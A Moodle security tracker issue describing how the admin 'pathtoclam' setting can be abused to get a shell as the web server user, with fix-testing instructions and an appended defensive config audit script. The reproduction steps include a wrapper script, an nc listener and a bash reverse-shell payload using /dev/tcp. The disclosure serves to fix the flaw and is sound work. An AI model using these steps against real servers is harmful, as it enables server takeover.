MDL-35852

PRIVESC: admin setting pathtoclam can be abused to gain a system shell

    Details

    • Testing Instructions:
      1. set this in config.php: $CFG->preventexecpath = true;
      2. visit admin settings that use execpath (admin > server > system paths)
      3. check to make sure a warning is displayed to say the values are disabled in config.php
      4. try to edit/change the settings/save and then check to see if the settings were changed.
      5. NOTE: as per hardcoding of other $CFG vars it doesn't lock the field - it just prevents saving over the top of the hardcoded values.
    • Affected Branches:
      MOODLE_23_STABLE
    • Fixed Branches:
      MOODLE_25_STABLE
    • Pull Master Branch:
      master_MDL-35852

      Description

      If a malicious admin has access to the server, and can create an executable file, then they could abuse the pathtoclam setting to gain shell access as the user running the web server.
      On earlier versions, it may use the upload_manager class instead of the repositories api to scan the file, so this existing access may not be needed.

      Steps:

      • Web Admin to create a file /home/admin/bash with following contents
        #!/bin/bash
        shift;/bin/bash $*
        (the shift is to get rid of the --stdout argument passed in on repository/lib.php line 1082)
      • Web Admin to start a listener using nc or equivalent
        nc -l 127.0.0.1 -p 4444
      • Set pathtoclam to /home/admin/bash, and set runclamonupload to true
      • Upload a file with contents such as
        #!/bin/bash
        /bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
      • In the nc session, the user now has a shell session started by web server

      This could potentially be done by any user if there are CSRF-vulnerable parts of Moodle
      that could use that attack to set the pathtoclam on behalf of the admin; the actual
      uploading of a file to get the shell can be done by any user.

      Once a shell is established, a backdoor could be set up.

      If in earlier versions, the clam scan doesn't run in repository/lib.php but instead in
      lib/uploadlib.php, then the existing access is not needed, and you could use instead a
      pathtoclam of /bin/bash, as there is no --stdout argument.

      Cheers,

      Hugh
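The following is an added defender-side audit, not Moodle's own code and not part of this report. It reads a Moodle config.php and checks for the hardening described in the testing instructions: $CFG->preventexecpath hard-coded to true, and pathtoclam hard-coded to a ClamAV scanner that lives in a system bin directory, is root-owned and is not writable by others. It assumes plain `$CFG->name = value;` lines in config.php; the sample config it writes is constructed for the demonstration.

```shell
#!/bin/sh
# Added audit helper for MDL-35852 (not Moodle code). Checks a config.php for
# preventexecpath = true and a trustworthy hard-coded pathtoclam. Assumes
# simple `$CFG->name = value;` lines; the sample config below is constructed.

# cfg_value FILE NAME: print the value of $CFG->NAME with quotes stripped (empty if absent).
cfg_value() {
  sed -n "s/^[[:space:]]*\\\$CFG->$2[[:space:]]*=[[:space:]]*['\"]\\{0,1\\}\\([^'\";]*\\)['\"]\\{0,1\\}[[:space:]]*;.*/\\1/p" "$1" | head -n 1
}

# preventexecpath_set FILE: succeed only if config.php hard-codes preventexecpath = true.
preventexecpath_set() {
  grep -Eq '^[[:space:]]*\$CFG->preventexecpath[[:space:]]*=[[:space:]]*true[[:space:]]*;' "$1"
}

# trusted_scanner PATH: succeed only if PATH is clamscan/clamdscan in a system bin
# directory and is a root-owned, owner-executable, non-world-writable regular file.
trusted_scanner() {
  case "$1" in
    /usr/bin/clamscan|/usr/bin/clamdscan|/usr/local/bin/clamscan|/usr/local/bin/clamdscan) ;;
    *) return 1 ;;
  esac
  find "$1" -prune -type f -perm -100 -user root ! -perm -002 -print | grep -q .
}

# audit_config FILE: print findings; return 0 when hardened, 1 otherwise.
audit_config() {
  rc=0
  if preventexecpath_set "$1"; then
    echo "ok: preventexecpath hard-coded, web UI cannot override execpath settings"
  else
    echo "FINDING: preventexecpath not set; execpath settings are web-editable"
    rc=1
  fi
  clam="$(cfg_value "$1" pathtoclam)"
  if [ -n "$clam" ] && trusted_scanner "$clam"; then
    echo "ok: pathtoclam=$clam is a trusted ClamAV binary"
  else
    echo "FINDING: pathtoclam='${clam:-<not hard-coded>}' is not a trusted ClamAV binary"
    rc=1
  fi
  return $rc
}

# Constructed sample config.php reproducing the weak state from the report.
WEAK_CFG="$(mktemp)"
printf '%s\n' '<?php' "\$CFG->pathtoclam = '/home/admin/bash';" "\$CFG->runclamonupload = true;" > "$WEAK_CFG"
if audit_config "$WEAK_CFG"; then echo "result: hardened"; else echo "result: NOT hardened"; fi
```

Run it against a real config.php by calling `audit_config /path/to/config.php`; a non-zero exit means at least one finding.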

      Dates

      • Fix Release Date: 14/May/13